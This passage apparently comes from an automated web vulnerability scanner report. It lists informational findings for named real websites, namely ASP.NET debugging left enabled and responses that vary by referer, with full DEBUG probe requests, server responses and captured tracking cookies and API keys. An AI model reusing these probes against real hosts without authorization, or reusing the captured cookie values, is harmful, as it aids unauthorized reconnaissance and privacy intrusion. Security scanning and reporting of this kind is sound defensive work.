WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

20.6. http://www.crankyape.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.crankyape.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.crankyape.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 01 May 2011 23:41:51 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

20.7. https://www.crankyape.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.crankyape.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.crankyape.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Mon, 02 May 2011 01:53:39 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

20.8. http://www.freeprintablecalendar.net/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.freeprintablecalendar.net
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.freeprintablecalendar.net
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 01 May 2011 23:16:36 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

20.9. http://www.mrsdash.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mrsdash.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.mrsdash.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Mon, 02 May 2011 00:08:52 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

20.10. http://www.skipcain.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skipcain.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.skipcain.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 01 May 2011 23:55:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

20.11. http://www.tracklead.net/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tracklead.net
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.tracklead.net
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: keep-alive
Date: Mon, 02 May 2011 00:42:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: LinkTrust
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

20.12. http://www.wvcommerce.org/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wvcommerce.org
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.wvcommerce.org
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Mon, 02 May 2011 00:01:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

21. Referer-dependent response
There are 4 instances of this issue:


21.1. http://ads.adbrite.com/adserver/behavioral-data/8201

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8201

Request 1

GET /adserver/behavioral-data/8201?d=1031 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; ut="1%3AHYxBDoMgEAD%2FsmcOLiht%2FI0oRtPNWsCWoOvfJV5nJnPCX0N%2FwseXvMUpQQ8hmCMLhreJJFqwU0mniILfMjPLIIj7oRJ5olq5PW%2FyEuuMGheya7EtVzw1v2qlAQVuYPZxfd5wXTc%3D"; vsd=0@1@4dbd2e3d@www.britepic.com; fq="84fok%2C1uo0%7Clkigxp"

Response 1

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 01:56:59 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 03-May-2011 01:56:59 GMT
Set-Cookie: ut="1%3AHY1BDoMgEAD%2FsmcOLFRr%2FA0oVdMNFlAJuP69ttfJZOaEQ0F%2FwtuVvMYxQQ%2FDPHdTkOZgDDTtlZGlSCpFZPyUl%2FdsGHGrIgRd8y11OhIrxkYkckQ3sVte%2Bcmt1WKYqV1K%2B%2FA3HuVOvxoIsMZ7F5f%2FEK7rCw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 01:56:59 GMT
Set-Cookie: vsd=0@1@4dbe0f6b@loadus.exelator.com; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 01:56:59 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /adserver/behavioral-data/8201?d=1031 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; ut="1%3AHYxBDoMgEAD%2FsmcOLiht%2FI0oRtPNWsCWoOvfJV5nJnPCX0N%2FwseXvMUpQQ8hmCMLhreJJFqwU0mniILfMjPLIIj7oRJ5olq5PW%2FyEuuMGheya7EtVzw1v2qlAQVuYPZxfd5wXTc%3D"; vsd=0@1@4dbd2e3d@www.britepic.com; fq="84fok%2C1uo0%7Clkigxp"

Response 2

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 01:57:33 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 03-May-2011 01:57:33 GMT
Set-Cookie: ut="1%3AHY1BDoMgEAD%2FsmcOLrTU%2BBtQKqYbLGBFdP17ba%2BTycwBq4TugJerZU5Dhg5679sxNmZljDSuGyM3IsuckPFdnyGwYcRlFzGqvVxSqxKxZLyLTI7oInYpMz9YWyV6T3qq%2BhYuPDQf%2BtVAgDUhuDT9h3CeXw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 01:57:33 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Mon, 02-May-2011 01:57:33 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

21.2. http://ads.adbrite.com/adserver/vdi/762701

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Request 1

GET /adserver/vdi/762701?d=978972DFA063000D2C0E7A380BFA1DEC HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; b="%3A%3A12ggb%2C6e73"; ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; vsd=0@2@4dbe115c@websiteprice.net; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"

Response 1

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 02:21:42 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjAKBjc2MjcwMRiu4KfOEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUQAQ; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:21:42 GMT
Set-Cookie: ut="1%3AHc7LDoMgEIXhd5k1CwarJb4NqBXTKRTwEnV892K3f76TnBNWBe0J72HfQuoztNA5p8cozcoYaZw%2FrNiKrHJCxu%2F%2B8p4NI86HiLE6toJ0laggrEU2qjf3zOnMyJJxCVJkGohKtfMW%2BMmNrUTnqJn25uFL7uVCNwYB1ng%2FpOl%2FA67rBw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:21:42 GMT
Set-Cookie: vsd=0@3@4dbe1536@websiteprice.net; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:21:42 GMT
Set-Cookie: rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:21:42 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /adserver/vdi/762701?d=978972DFA063000D2C0E7A380BFA1DEC HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; b="%3A%3A12ggb%2C6e73"; ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; vsd=0@2@4dbe115c@websiteprice.net; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"

Response 2

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 02:22:19 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjAKBjc2MjcwMRjC-6nOEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUQAQ; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:22:19 GMT
Set-Cookie: ut="1%3AHc7LDoMgEIXhd5k1CwarJb4NqBXTKRTwEnV892K3f76TnBNWBe0J72HfQuoztNA5p8cozcoYaZw%2FrNiKrHJCxu%2F%2B8p4NI86HiLE6toJ0laggrEU2qjf3zOnMyJJxCVJkGohKtfMW%2BMmNrUTnqJn25uFL7uVCNwYB1ng%2FpOl%2FA67rBw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:22:19 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Mon, 02-May-2011 02:22:19 GMT
Set-Cookie: rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:22:19 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

21.3. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Request 1

GET /extern/login_status.php?api_key=1bce446ae7066140a11bdbb8de657dd9&extern=0&channel=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-adv%2Fjobs4%2Fhtml%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.72.41
X-Cnection: close
Date: Sun, 01 May 2011 23:33:41 GMT
Content-Length: 1235

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"washingtonpost.com","channe
...[SNIP]...
ashingtonpost.com\/wp-adv\/jobs4\/html\/xd_receiver.htm","connect_state":2,"debug":false,"granted_perms":null,"in_facebook":true,"locale":"en_US","origin":null,"public_session_data":null,"referer_url":"http:\/\/www.washingtonpost.com\/wl\/jobs\/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907","session":null,"https":false};
FB.Bootstrap._requireFeatures(["Connect"], function() {
if (config.debug) {
FB.FBDebug.isEnabled = true;
FB.FBDebug.logLevel = 6;
}
FB.XdComm.Server.init("/xd_receiver_v0.4.php");
new FBIntern.LoginStatus().initialize(
config.channel,
config.session,
{ inFacebook: config.in_facebook, locale: config.locale },
config.connect_state,
config.base_domain,
config.public_session_data,
config.referer_url,
config.origin,
config.granted_perms,
config.https
);
});
</script>

Request 2

GET /extern/login_status.php?api_key=1bce446ae7066140a11bdbb8de657dd9&extern=0&channel=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-adv%2Fjobs4%2Fhtml%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.87.47
X-Cnection: close
Date: Sun, 01 May 2011 23:34:12 GMT
Content-Length: 1097

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"washingtonpost.com","channe
...[SNIP]...
ashingtonpost.com\/wp-adv\/jobs4\/html\/xd_receiver.htm","connect_state":2,"debug":false,"granted_perms":null,"in_facebook":true,"locale":"en_US","origin":null,"public_session_data":null,"referer_url":null,"session":null,"https":false};
FB.Bootstrap._requireFeatures(["Connect"], function() {
if (config.debug) {
FB.FBDebug.isEnabled = true;
FB.FBDebug.logLevel = 6;
}
FB.XdComm.Server.init("/xd_receiver_v0.4.php");
new FBIntern.LoginStatus().initialize(
config.channel,
config.session,
{ inFacebook: config.in_facebook, locale: config.locale },
config.connect_state,
config.base_domain,
config.public_session_data,
config.referer_url,
config.origin,
config.granted_perms,
config.https
);
});
</script>

21.4. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110501_0700%26ssh%3D1121929261%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.70.50
X-Cnection: close
Date: Sun, 01 May 2011 23:32:34 GMT
Content-Length: 8636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dbded924109d9e80834178" class="connect_widget" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div 